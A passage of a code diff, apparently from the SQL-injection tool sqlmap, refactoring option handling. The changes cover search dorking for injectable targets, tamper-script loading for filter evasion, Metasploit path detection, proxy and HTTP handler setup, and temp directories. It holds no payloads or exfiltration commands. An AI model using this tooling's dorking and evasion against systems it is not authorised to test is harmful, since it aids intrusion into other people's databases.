OSError, MemoryError), ex: errMsg = "something went wrong while trying " - errMsg += "to read the content of file '%s' ('%s')" % (reqFile, ex) + errMsg += "to read the content of file '%s' ('%s')" % (reqFile, getSafeExString(ex)) raise SqlmapSystemException(errMsg) if conf.scope: @@ -415,8 +399,8 @@ def _loadQueries(): try: tree.parse(paths.QUERIES_XML) except Exception, ex: - errMsg = "something seems to be wrong with " - errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, ex) + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). Please make " % (paths.QUERIES_XML, getSafeExString(ex)) errMsg += "sure that you haven't made any changes to it" raise SqlmapInstallationException, errMsg @@ -501,14 +485,14 @@ def _setRequestFromFile(): conf.requestFile = safeExpandUser(conf.requestFile) - infoMsg = "parsing HTTP request from '%s'" % conf.requestFile - logger.info(infoMsg) - if not os.path.isfile(conf.requestFile): - errMsg = "the specified HTTP request file " + errMsg = "specified HTTP request file '%s' " % conf.requestFile errMsg += "does not exist" raise SqlmapFilePathException(errMsg) + infoMsg = "parsing HTTP request from '%s'" % conf.requestFile + logger.info(infoMsg) + _feedTargetsDict(conf.requestFile, addedTargetUrls) def _setCrawler(): @@ -531,49 +515,26 @@ def _setCrawler(): status = "%d/%d links visited (%d%%)" % (i + 1, len(targets), round(100.0 * (i + 1) / len(targets))) dataToStdout("\r[%s] [INFO] %s" % (time.strftime("%X"), status), True) except Exception, ex: - errMsg = "problem occurred while crawling at '%s' ('%s')" % (target, ex) + errMsg = "problem occurred while crawling at '%s' ('%s')" % (target, getSafeExString(ex)) logger.error(errMsg) -def _setGoogleDorking(): +def _doSearch(): """ - This function checks if the way to request testable hosts is through - Google dorking then requests to Google the search parameter, parses - the results and save the testable hosts into the knowledge base. + This function performs search dorking, parses results + and saves the testable hosts into the knowledge base. """ if not conf.googleDork: return - global keepAliveHandler - global proxyHandler - - debugMsg = "initializing Google dorking requests" - logger.debug(debugMsg) - - infoMsg = "first request to Google to get the session cookie" - logger.info(infoMsg) - - handlers = [proxyHandler] - - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html - if conf.keepAlive: - if conf.proxy: - warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " - warnMsg += "been disabled because of its incompatibility " - warnMsg += "with HTTP(s) proxy" - logger.warn(warnMsg) - else: - handlers.append(keepAliveHandler) - - googleObj = Google(handlers) kb.data.onlyGETs = None def retrieve(): - links = googleObj.search(conf.googleDork) + links = search(conf.googleDork) if not links: errMsg = "unable to find results for your " - errMsg += "Google dork expression" + errMsg += "search dork expression" raise SqlmapGenericException(errMsg) for link in links: @@ -583,8 +544,7 @@ def _setGoogleDorking(): elif re.search(URI_INJECTABLE_REGEX, link, re.I): if kb.data.onlyGETs is None and conf.data is None and not conf.googleDork: message = "do you want to scan only results containing GET parameters? [Y/n] " - test = readInput(message, default="Y") - kb.data.onlyGETs = test.lower() != 'n' + kb.data.onlyGETs = readInput(message, default='Y', boolean=True) if not kb.data.onlyGETs or conf.googleDork: kb.targets.add((link, conf.method, conf.data, conf.cookie, None)) @@ -595,7 +555,7 @@ def _setGoogleDorking(): if kb.targets: infoMsg = "sqlmap got %d results for your " % len(links) - infoMsg += "Google dork expression, " + infoMsg += "search dork expression, " if len(links) == len(kb.targets): infoMsg += "all " @@ -608,12 +568,11 @@ def _setGoogleDorking(): else: message = "sqlmap got %d results " % len(links) - message += "for your Google dork expression, but none of them " + message += "for your search dork expression, but none of them " message += "have GET parameters to test for SQL injection. " message += "Do you want to skip to the next result page? [Y/n]" - test = readInput(message, default="Y") - if test[0] in ("n", "N"): + if not readInput(message, default='Y', boolean=True): raise SqlmapSilentQuitException else: conf.googlePage += 1 @@ -636,7 +595,7 @@ def _setBulkMultipleTargets(): for line in getFileItems(conf.bulkFile): if re.match(r"[^ ]+\?(.+)", line, re.I) or CUSTOM_INJECTION_MARK_CHAR in line: found = True - kb.targets.add((line.strip(), None, None, None, None)) + kb.targets.add((line.strip(), conf.method, conf.data, conf.cookie, None)) if not found and not conf.forms and not conf.crawlDepth: warnMsg = "no usable links found (with GET parameters)" @@ -670,7 +629,7 @@ def _findPageForms(): logger.info(infoMsg) if not any((conf.bulkFile, conf.googleDork, conf.sitemapUrl)): - page, _ = Request.queryPage(content=True) + page, _, _ = Request.queryPage(content=True) findPageForms(page, conf.url, True, True) else: if conf.bulkFile: @@ -692,7 +651,7 @@ def _findPageForms(): except KeyboardInterrupt: break except Exception, ex: - errMsg = "problem occurred while searching for forms at '%s' ('%s')" % (target, ex) + errMsg = "problem occurred while searching for forms at '%s' ('%s')" % (target, getSafeExString(ex)) logger.error(errMsg) def _setDBMSAuthentication(): @@ -774,6 +733,7 @@ def _setMetasploit(): kb.oldMsf = True else: msfEnvPathExists = False + conf.msfPath = path break @@ -804,7 +764,7 @@ def _setMetasploit(): for envPath in envPaths: envPath = envPath.replace(";", "") - if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("", "msfcli", "msfconsole")): + if any(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfcli", "msfconsole")): msfEnvPathExists = True if all(os.path.exists(normalizePath(os.path.join(envPath, _))) for _ in ("msfvenom",)): kb.oldMsf = False @@ -931,32 +891,37 @@ def _setTamperingFunctions(): resolve_priorities = False priorities = [] - for tfile in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper): + for script in re.split(PARAMETER_SPLITTING_REGEX, conf.tamper): found = False - tfile = tfile.strip() + path = paths.SQLMAP_TAMPER_PATH.encode(sys.getfilesystemencoding() or UNICODE_ENCODING) + script = script.strip().encode(sys.getfilesystemencoding() or UNICODE_ENCODING) - if not tfile: - continue + try: + if not script: + continue - elif os.path.exists(os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile)): - tfile = os.path.join(paths.SQLMAP_TAMPER_PATH, tfile if tfile.endswith('.py') else "%s.py" % tfile) + elif os.path.exists(os.path.join(path, script if script.endswith(".py") else "%s.py" % script)): + script = os.path.join(path, script if script.endswith(".py") else "%s.py" % script) - elif not os.path.exists(tfile): - errMsg = "tamper script '%s' does not exist" % tfile - raise SqlmapFilePathException(errMsg) + elif not os.path.exists(script): + errMsg = "tamper script '%s' does not exist" % script + raise SqlmapFilePathException(errMsg) - elif not tfile.endswith('.py'): - errMsg = "tamper script '%s' should have an extension '.py'" % tfile + elif not script.endswith(".py"): + errMsg = "tamper script '%s' should have an extension '.py'" % script + raise SqlmapSyntaxException(errMsg) + except UnicodeDecodeError: + errMsg = "invalid character provided in option '--tamper'" raise SqlmapSyntaxException(errMsg) - dirname, filename = os.path.split(tfile) + dirname, filename = os.path.split(script) dirname = os.path.abspath(dirname) infoMsg = "loading tamper script '%s'" % filename[:-3] logger.info(infoMsg) - if not os.path.exists(os.path.join(dirname, '__init__.py')): + if not os.path.exists(os.path.join(dirname, "__init__.py")): errMsg = "make sure that there is an empty file '__init__.py' " errMsg += "inside of tamper scripts directory '%s'" % dirname raise SqlmapGenericException(errMsg) @@ -965,11 +930,11 @@ def _setTamperingFunctions(): sys.path.insert(0, dirname) try: - module = __import__(filename[:-3]) - except (ImportError, SyntaxError), msg: - raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], msg)) + module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING)) + except (ImportError, SyntaxError), ex: + raise SqlmapSyntaxException("cannot import tamper script '%s' (%s)" % (filename[:-3], getSafeExString(ex))) - priority = PRIORITY.NORMAL if not hasattr(module, '__priority__') else module.__priority__ + priority = PRIORITY.NORMAL if not hasattr(module, "__priority__") else module.__priority__ for name, function in inspect.getmembers(module, inspect.isfunction): if name == "tamper" and inspect.getargspec(function).args and inspect.getargspec(function).keywords == "kwargs": @@ -978,17 +943,17 @@ def _setTamperingFunctions(): function.func_name = module.__name__ if check_priority and priority > last_priority: - message = "it seems that you might have mixed " + message = "it appears that you might have mixed " message += "the order of tamper scripts. " message += "Do you want to auto resolve this? [Y/n/q] " - test = readInput(message, default="Y") + choice = readInput(message, default='Y').upper() - if not test or test[0] in ("y", "Y"): - resolve_priorities = True - elif test[0] in ("n", "N"): + if choice == 'N': resolve_priorities = False - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException + else: + resolve_priorities = True check_priority = False @@ -1001,7 +966,7 @@ def _setTamperingFunctions(): if not found: errMsg = "missing function 'tamper(payload, **kwargs)' " - errMsg += "in tamper script '%s'" % tfile + errMsg += "in tamper script '%s'" % script raise SqlmapGenericException(errMsg) if kb.tamperFunctions and len(kb.tamperFunctions) > 3: @@ -1018,7 +983,7 @@ def _setTamperingFunctions(): def _setWafFunctions(): """ - Loads WAF/IDS/IPS detecting functions from script(s) + Loads WAF/IPS/IDS detecting functions from script(s) """ if conf.identifyWaf: @@ -1038,7 +1003,7 @@ def _setWafFunctions(): try: if filename[:-3] in sys.modules: del sys.modules[filename[:-3]] - module = __import__(filename[:-3]) + module = __import__(filename[:-3].encode(sys.getfilesystemencoding() or UNICODE_ENCODING)) except ImportError, msg: raise SqlmapSyntaxException("cannot import WAF script '%s' (%s)" % (filename[:-3], msg)) @@ -1050,6 +1015,8 @@ def _setWafFunctions(): else: kb.wafFunctions.append((_["detect"], _.get("__product__", filename[:-3]))) + kb.wafFunctions = sorted(kb.wafFunctions, key=lambda _: "generic" in _[1].lower()) + def _setThreads(): if not isinstance(conf.threads, int) or conf.threads <= 0: conf.threads = 1 @@ -1060,18 +1027,74 @@ def _setDNSCache(): """ def _getaddrinfo(*args, **kwargs): - if args in kb.cache: - return kb.cache[args] + if args in kb.cache.addrinfo: + return kb.cache.addrinfo[args] else: - kb.cache[args] = socket._getaddrinfo(*args, **kwargs) - return kb.cache[args] + kb.cache.addrinfo[args] = socket._getaddrinfo(*args, **kwargs) + return kb.cache.addrinfo[args] - if not hasattr(socket, '_getaddrinfo'): + if not hasattr(socket, "_getaddrinfo"): socket._getaddrinfo = socket.getaddrinfo socket.getaddrinfo = _getaddrinfo -def _setHTTPProxy(): +def _setSocketPreConnect(): + """ + Makes a pre-connect version of socket.connect + """ + + if conf.disablePrecon: + return + + def _(): + while kb.get("threadContinue") and not conf.get("disablePrecon"): + try: + for key in socket._ready: + if len(socket._ready[key]) < SOCKET_PRE_CONNECT_QUEUE_SIZE: + family, type, proto, address = key + s = socket.socket(family, type, proto) + s._connect(address) + with kb.locks.socket: + socket._ready[key].append((s._sock, time.time())) + except KeyboardInterrupt: + break + except: + pass + finally: + time.sleep(0.01) + + def connect(self, address): + found = False + + key = (self.family, self.type, self.proto, address) + with kb.locks.socket: + if key not in socket._ready: + socket._ready[key] = [] + while len(socket._ready[key]) > 0: + candidate, created = socket._ready[key].pop(0) + if (time.time() - created) < PRECONNECT_CANDIDATE_TIMEOUT: + self._sock = candidate + found = True + break + else: + try: + candidate.close() + except socket.error: + pass + + if not found: + self._connect(address) + + if not hasattr(socket.socket, "_connect"): + socket._ready = {} + socket.socket._connect = socket.socket.connect + socket.socket.connect = connect + + thread = threading.Thread(target=_) + setDaemon(thread) + thread.start() + +def _setHTTPHandlers(): """ Check and set the HTTP/SOCKS proxy for all HTTP requests. """ @@ -1081,80 +1104,114 @@ def _setHTTPProxy(): if hasattr(proxyHandler, "%s_open" % _): delattr(proxyHandler, "%s_open" % _) - if not conf.proxy: - if conf.proxyList: - conf.proxy = conf.proxyList[0] - conf.proxyList = conf.proxyList[1:] + conf.proxyList[:1] + if conf.proxyList is not None: + if not conf.proxyList: + errMsg = "list of usable proxies is exhausted" + raise SqlmapNoneDataException(errMsg) - infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy - logger.info(infoMsg) - else: - if conf.hostname in ('localhost', '127.0.0.1') or conf.ignoreProxy: - proxyHandler.proxies = {} + conf.proxy = conf.proxyList[0] + conf.proxyList = conf.proxyList[1:] - return + infoMsg = "loading proxy '%s' from a supplied proxy list file" % conf.proxy + logger.info(infoMsg) - debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests" - logger.debug(debugMsg) + elif not conf.proxy: + if conf.hostname in ("localhost", "127.0.0.1") or conf.ignoreProxy: + proxyHandler.proxies = {} - try: - _ = urlparse.urlsplit(conf.proxy) - except Exception, ex: - errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, ex) - raise SqlmapSyntaxException, errMsg + if conf.proxy: + debugMsg = "setting the HTTP/SOCKS proxy for all HTTP requests" + logger.debug(debugMsg) - hostnamePort = _.netloc.split(":") - - scheme = _.scheme.upper() - hostname = hostnamePort[0] - port = None - username = None - password = None - - if len(hostnamePort) == 2: try: - port = int(hostnamePort[1]) - except: - pass # drops into the next check block + _ = urlparse.urlsplit(conf.proxy) + except Exception, ex: + errMsg = "invalid proxy address '%s' ('%s')" % (conf.proxy, getSafeExString(ex)) + raise SqlmapSyntaxException, errMsg - if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)): - errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE)) - raise SqlmapSyntaxException(errMsg) + hostnamePort = _.netloc.split(":") - if conf.proxyCred: - _ = re.search("^(.*?):(.*?)$", conf.proxyCred) - if not _: - errMsg = "Proxy authentication credentials " - errMsg += "value must be in format username:password" + scheme = _.scheme.upper() + hostname = hostnamePort[0] + port = None + username = None + password = None + + if len(hostnamePort) == 2: + try: + port = int(hostnamePort[1]) + except: + pass # drops into the next check block + + if not all((scheme, hasattr(PROXY_TYPE, scheme), hostname, port)): + errMsg = "proxy value must be in format '(%s)://address:port'" % "|".join(_[0].lower() for _ in getPublicTypeMembers(PROXY_TYPE)) raise SqlmapSyntaxException(errMsg) - else: - username = _.group(1) - password = _.group(2) - - if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5): - proxyHandler.proxies = {} - - socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password) - socks.wrapmodule(urllib2) - else: - socks.unwrapmodule(urllib2) if conf.proxyCred: - # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection - proxyString = "%s@" % conf.proxyCred + _ = re.search("^(.*?):(.*?)$", conf.proxyCred) + if not _: + errMsg = "proxy authentication credentials " + errMsg += "value must be in format username:password" + raise SqlmapSyntaxException(errMsg) + else: + username = _.group(1) + password = _.group(2) + + if scheme in (PROXY_TYPE.SOCKS4, PROXY_TYPE.SOCKS5): + proxyHandler.proxies = {} + + socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5 if scheme == PROXY_TYPE.SOCKS5 else socks.PROXY_TYPE_SOCKS4, hostname, port, username=username, password=password) + socks.wrapmodule(urllib2) else: - proxyString = "" + socks.unwrapmodule(urllib2) - proxyString += "%s:%d" % (hostname, port) - proxyHandler.proxies = {"http": proxyString, "https": proxyString} + if conf.proxyCred: + # Reference: http://stackoverflow.com/questions/34079/how-to-specify-an-authenticated-proxy-for-a-python-http-connection + proxyString = "%s@" % conf.proxyCred + else: + proxyString = "" - proxyHandler.__init__(proxyHandler.proxies) + proxyString += "%s:%d" % (hostname, port) + proxyHandler.proxies = {"http": proxyString, "https": proxyString} + + proxyHandler.__init__(proxyHandler.proxies) + + debugMsg = "creating HTTP requests opener object" + logger.debug(debugMsg) + + handlers = filter(None, [multipartPostHandler, proxyHandler if proxyHandler.proxies else None, authHandler, redirectHandler, rangeHandler, httpsHandler]) + + if not conf.dropSetCookie: + if not conf.loadCookies: + conf.cj = cookielib.CookieJar() + else: + conf.cj = cookielib.MozillaCookieJar() + resetCookieJar(conf.cj) + + handlers.append(urllib2.HTTPCookieProcessor(conf.cj)) + + # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html + if conf.keepAlive: + warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " + warnMsg += "been disabled because of its incompatibility " + + if conf.proxy: + warnMsg += "with HTTP(s) proxy" + logger.warn(warnMsg) + elif conf.authType: + warnMsg += "with authentication methods" + logger.warn(warnMsg) + else: + handlers.append(keepAliveHandler) + + opener = urllib2.build_opener(*handlers) + urllib2.install_opener(opener) def _setSafeVisit(): """ Check and set the safe visit options. """ - if not any ((conf.safeUrl, conf.safeReqFile)): + if not any((conf.safeUrl, conf.safeReqFile)): return if conf.safeReqFile: @@ -1255,13 +1312,13 @@ def _setHTTPAuthentication(): global authHandler - if not conf.authType and not conf.authCred and not conf.authPrivate: + if not conf.authType and not conf.authCred and not conf.authFile: return - if conf.authPrivate and not conf.authType: + if conf.authFile and not conf.authType: conf.authType = AUTH_TYPE.PKI - elif conf.authType and not conf.authCred and not conf.authPrivate: + elif conf.authType and not conf.authCred and not conf.authFile: errMsg = "you specified the HTTP authentication type, but " errMsg += "did not provide the credentials" raise SqlmapSyntaxException(errMsg) @@ -1276,21 +1333,21 @@ def _setHTTPAuthentication(): errMsg += "Basic, Digest, NTLM or PKI" raise SqlmapSyntaxException(errMsg) - if not conf.authPrivate: + if not conf.authFile: debugMsg = "setting the HTTP authentication type and credentials" logger.debug(debugMsg) - aTypeLower = conf.authType.lower() + authType = conf.authType.lower() - if aTypeLower in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST): + if authType in (AUTH_TYPE.BASIC, AUTH_TYPE.DIGEST): regExp = "^(.*?):(.*?)$" - errMsg = "HTTP %s authentication credentials " % aTypeLower + errMsg = "HTTP %s authentication credentials " % authType errMsg += "value must be in format 'username:password'" - elif aTypeLower == AUTH_TYPE.NTLM: + elif authType == AUTH_TYPE.NTLM: regExp = "^(.*\\\\.*):(.*?)$" errMsg = "HTTP NTLM authentication credentials value must " errMsg += "be in format 'DOMAIN\username:password'" - elif aTypeLower == AUTH_TYPE.PKI: + elif authType == AUTH_TYPE.PKI: errMsg = "HTTP PKI authentication require " errMsg += "usage of option `--auth-pki`" raise SqlmapSyntaxException(errMsg) @@ -1307,13 +1364,13 @@ def _setHTTPAuthentication(): _setAuthCred() - if aTypeLower == AUTH_TYPE.BASIC: + if authType == AUTH_TYPE.BASIC: authHandler = SmartHTTPBasicAuthHandler(kb.passwordMgr) - elif aTypeLower == AUTH_TYPE.DIGEST: + elif authType == AUTH_TYPE.DIGEST: authHandler = urllib2.HTTPDigestAuthHandler(kb.passwordMgr) - elif aTypeLower == AUTH_TYPE.NTLM: + elif authType == AUTH_TYPE.NTLM: try: from ntlm import HTTPNtlmAuthHandler except ImportError: @@ -1327,7 +1384,7 @@ def _setHTTPAuthentication(): debugMsg = "setting the HTTP(s) authentication PEM private key" logger.debug(debugMsg) - _ = safeExpandUser(conf.authPrivate) + _ = safeExpandUser(conf.authFile) checkFile(_) authHandler = HTTPSPKIAuthHandler(_) @@ -1351,17 +1408,13 @@ def _setHTTPExtraHeaders(): errMsg = "invalid header value: %s. Valid header format is 'name:value'" % repr(headerValue).lstrip('u') raise SqlmapSyntaxException(errMsg) - elif not conf.httpHeaders or len(conf.httpHeaders) == 1: - conf.httpHeaders.append((HTTP_HEADER.ACCEPT_LANGUAGE, "en-us,en;q=0.5")) - if not conf.charset: - conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "ISO-8859-15,utf-8;q=0.7,*;q=0.7")) - else: + elif not conf.requestFile and len(conf.httpHeaders or []) < 2: + if conf.charset: conf.httpHeaders.append((HTTP_HEADER.ACCEPT_CHARSET, "%s;q=0.7,*;q=0.1" % conf.charset)) # Invalidating any caching mechanism in between - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec14.html - conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache,no-store")) - conf.httpHeaders.append((HTTP_HEADER.PRAGMA, "no-cache")) + # Reference: http://stackoverflow.com/a/1383359 + conf.httpHeaders.append((HTTP_HEADER.CACHE_CONTROL, "no-cache")) def _defaultHTTPUserAgent(): """ @@ -1371,13 +1424,6 @@ def _defaultHTTPUserAgent(): return "%s (%s)" % (VERSION_STRING, SITE) - # Firefox 3 running on Ubuntu 9.04 updated at April 2009 - #return "Mozilla/5.0 (X11; U; Linux i686; en-GB; rv:1.9.0.9) Gecko/2009042113 Ubuntu/9.04 (jaunty) Firefox/3.0.9" - - # Internet Explorer 7.0 running on Windows 2003 Service Pack 2 english - # updated at March 2009 - #return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.2; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.04506.648; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)" - def _setHTTPUserAgent(): """ Set the HTTP User-Agent header. @@ -1516,24 +1562,51 @@ def _createTemporaryDirectory(): Creates temporary directory for this run. """ - try: - if not os.path.isdir(tempfile.gettempdir()): - os.makedirs(tempfile.gettempdir()) - except IOError, ex: - errMsg = "there has been a problem while accessing " - errMsg += "system's temporary directory location(s) ('%s'). Please " % ex.message - errMsg += "make sure that there is enough disk space left. If problem persists, " - errMsg += "try to set environment variable 'TEMP' to a location " - errMsg += "writeable by the current user" - raise SqlmapSystemException, errMsg + if conf.tmpDir: + try: + if not os.path.isdir(conf.tmpDir): + os.makedirs(conf.tmpDir) - if "sqlmap" not in (tempfile.tempdir or ""): - tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid())) + _ = os.path.join(conf.tmpDir, randomStr()) + + open(_, "w+b").close() + os.remove(_) + + tempfile.tempdir = conf.tmpDir + + warnMsg = "using '%s' as the temporary directory" % conf.tmpDir + logger.warn(warnMsg) + except (OSError, IOError), ex: + errMsg = "there has been a problem while accessing " + errMsg += "temporary directory location(s) ('%s')" % getSafeExString(ex) + raise SqlmapSystemException, errMsg + else: + try: + if not os.path.isdir(tempfile.gettempdir()): + os.makedirs(tempfile.gettempdir()) + except (OSError, IOError, WindowsError), ex: + warnMsg = "there has been a problem while accessing " + warnMsg += "system's temporary directory location(s) ('%s'). Please " % getSafeExString(ex) + warnMsg += "make sure that there is enough disk space left. If problem persists, " + warnMsg += "try to set environment variable 'TEMP' to a location " + warnMsg += "writeable by the current user" + logger.warn(warnMsg) + + if "sqlmap" not in (tempfile.tempdir or "") or conf.tmpDir and tempfile.tempdir == conf.tmpDir: + try: + tempfile.tempdir = tempfile.mkdtemp(prefix="sqlmap", suffix=str(os.getpid())) + except (OSError, IOError, WindowsError): + tempfile.tempdir = os.path.join(paths.SQLMAP_HOME_PATH, "tmp", "sqlmap%s%d" % (randomStr(6), os.getpid())) kb.tempDir = tempfile.tempdir if not os.path.isdir(tempfile.tempdir): - os.makedirs(tempfile.tempdir) + try: + os.makedirs(tempfile.tempdir) + except (OSError, IOError, WindowsError), ex: + errMsg = "there has been a problem while setting " + errMsg += "temporary directory location ('%s')" % getSafeExString(ex) + raise SqlmapSystemException, errMsg def _cleanupOptions(): """ @@ -1551,7 +1624,7 @@ def _cleanupOptions(): conf.progressWidth = width - 46 for key, value in conf.items(): - if value and any(key.endswith(_) for _ in ("Path", "File")): + if value and any(key.endswith(_) for _ in ("Path", "File", "Dir")): conf[key] = safeExpandUser(value) if conf.testParameter: @@ -1561,6 +1634,9 @@ def _cleanupOptions(): else: conf.testParameter = [] + if conf.agent: + conf.agent = re.sub(r"[\r\n]", "", conf.agent) + if conf.user: conf.user = conf.user.replace(" ", "") @@ -1579,6 +1655,9 @@ def _cleanupOptions(): else: conf.skip = [] + if conf.cookie: + conf.cookie = re.sub(r"[\r\n]", "", conf.cookie) + if conf.delay: conf.delay = float(conf.delay) @@ -1607,10 +1686,10 @@ def _cleanupOptions(): setOptimize() if conf.data: - conf.data = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data, re.I) + conf.data = re.sub("(?i)%s" % INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.data) if conf.url: - conf.url = re.sub(INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url, re.I) + conf.url = re.sub("(?i)%s" % INJECT_HERE_MARK.replace(" ", r"[^A-Za-z]*"), CUSTOM_INJECTION_MARK_CHAR, conf.url) if conf.os: conf.os = conf.os.capitalize() @@ -1622,6 +1701,20 @@ def _cleanupOptions(): conf.testFilter = conf.testFilter.strip('*+') conf.testFilter = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testFilter) + try: + re.compile(conf.testFilter) + except re.error: + conf.testFilter = re.escape(conf.testFilter) + + if conf.testSkip: + conf.testSkip = conf.testSkip.strip('*+') + conf.testSkip = re.sub(r"([^.])([*+])", "\g<1>.\g<2>", conf.testSkip) + + try: + re.compile(conf.testSkip) + except re.error: + conf.testSkip = re.escape(conf.testSkip) + if "timeSec" not in kb.explicitSettings: if conf.tor: conf.timeSec = 2 * conf.timeSec @@ -1650,8 +1743,8 @@ def _cleanupOptions(): conf.torType = conf.torType.upper() if conf.outputDir: - paths.SQLMAP_OUTPUT_PATH = conf.outputDir - setPaths() + paths.SQLMAP_OUTPUT_PATH = os.path.realpath(os.path.expanduser(conf.outputDir)) + setPaths(paths.SQLMAP_ROOT_PATH) if conf.string: try: @@ -1675,23 +1768,40 @@ def _cleanupOptions(): conf.torType = conf.torType.upper() if conf.col: - conf.col = re.sub(r"\s*,\s*", ",", conf.col) + conf.col = re.sub(r"\s*,\s*", ',', conf.col) if conf.excludeCol: - conf.excludeCol = re.sub(r"\s*,\s*", ",", conf.excludeCol) + conf.excludeCol = re.sub(r"\s*,\s*", ',', conf.excludeCol) if conf.binaryFields: - conf.binaryFields = re.sub(r"\s*,\s*", ",", conf.binaryFields) + conf.binaryFields = re.sub(r"\s*,\s*", ',', conf.binaryFields) + + if any((conf.proxy, conf.proxyFile, conf.tor)): + conf.disablePrecon = True threadData = getCurrentThreadData() threadData.reset() +def _cleanupEnvironment(): + """ + Cleanup environment (e.g. from leftovers after --sqlmap-shell). + """ + + if issubclass(urllib2.socket.socket, socks.socksocket): + socks.unwrapmodule(urllib2) + + if hasattr(socket, "_ready"): + socket._ready.clear() + def _dirtyPatches(): """ Place for "dirty" Python related patches """ - httplib._MAXLINE = 1 * 1024 * 1024 # to accept overly long result lines (e.g. SQLi results in HTTP header responses) + httplib._MAXLINE = 1 * 1024 * 1024 # accept overly long result lines (e.g. SQLi results in HTTP header responses) + + if IS_WIN: + from thirdparty.wininetpton import win_inet_pton # add support for inet_pton() on Windows OS def _purgeOutput(): """ @@ -1720,6 +1830,7 @@ def _setConfAttributes(): conf.dumpPath = None conf.hashDB = None conf.hashDBFile = None + conf.httpCollector = None conf.httpHeaders = [] conf.hostname = None conf.ipv6 = False @@ -1729,12 +1840,13 @@ def _setConfAttributes(): conf.parameters = {} conf.path = None conf.port = None - conf.proxyList = [] + conf.proxyList = None conf.resultsFilename = None conf.resultsFP = None conf.scheme = None conf.tests = [] conf.trafficFP = None + conf.HARCollectorFactory = None conf.wFileType = None def _setKnowledgeBaseAttributes(flushAll=True): @@ -1754,15 +1866,22 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.authHeader = None kb.bannerFp = AttribDict() kb.binaryField = False + kb.browserVerification = None kb.brute = AttribDict({"tables": [], "columns": []}) kb.bruteMode = False kb.cache = AttribDict() + kb.cache.addrinfo = {} kb.cache.content = {} + kb.cache.encoding = {} + kb.cache.intBoundaries = None + kb.cache.parsedDbms = {} kb.cache.regex = {} kb.cache.stdev = {} + kb.captchaDetected = None + kb.chars = AttribDict() kb.chars.delimiter = randomStr(length=6, lowercase=True) kb.chars.start = "%s%s%s" % (KB_CHARS_BOUNDARY_CHAR, randomStr(length=3, alphabet=KB_CHARS_LOW_FREQUENCY_ALPHABET), KB_CHARS_BOUNDARY_CHAR) @@ -1771,6 +1890,9 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.columnExistsChoice = None kb.commonOutputs = None + kb.connErrorChoice = None + kb.connErrorCounter = 0 + kb.cookieEncodeChoice = None kb.counters = {} kb.data = AttribDict() kb.dataOutputFlag = False @@ -1784,13 +1906,18 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.dnsMode = False kb.dnsTest = None kb.docRoot = None + kb.droppingRequests = False + kb.dumpColumns = None kb.dumpTable = None + kb.dumpKeyboardInterrupt = False kb.dynamicMarkings = [] kb.dynamicParameter = False kb.endDetection = False kb.explicitSettings = set() kb.extendTests = None + kb.errorChunkLength = None kb.errorIsNone = True + kb.falsePositives = [] kb.fileReadMode = False kb.followSitemapRecursion = None kb.forcedDbms = None @@ -1799,7 +1926,9 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.futileUnion = None kb.headersFp = {} kb.heuristicDbms = None + kb.heuristicExtendedDbms = None kb.heuristicMode = False + kb.heuristicPage = False kb.heuristicTest = None kb.hintValue = None kb.htmlFp = [] @@ -1814,7 +1943,7 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.lastParserStatus = None kb.locks = AttribDict() - for _ in ("cache", "count", "index", "io", "limit", "log", "redirect", "request", "value"): + for _ in ("cache", "connError", "count", "index", "io", "limit", "log", "socket", "redirect", "request", "value"): kb.locks[_] = threading.Lock() kb.matchRatio = None @@ -1858,18 +1987,24 @@ def _setKnowledgeBaseAttributes(flushAll=True): kb.reflectiveCounters = {REFLECTIVE_COUNTER.MISS: 0, REFLECTIVE_COUNTER.HIT: 0} kb.requestCounter = 0 kb.resendPostOnRedirect = None - kb.responseTimes = [] + kb.resolutionDbms = None + kb.responseTimes = {} + kb.responseTimeMode = None + kb.responseTimePayload = None kb.resumeValues = True + kb.rowXmlMode = False kb.safeCharEncode = False 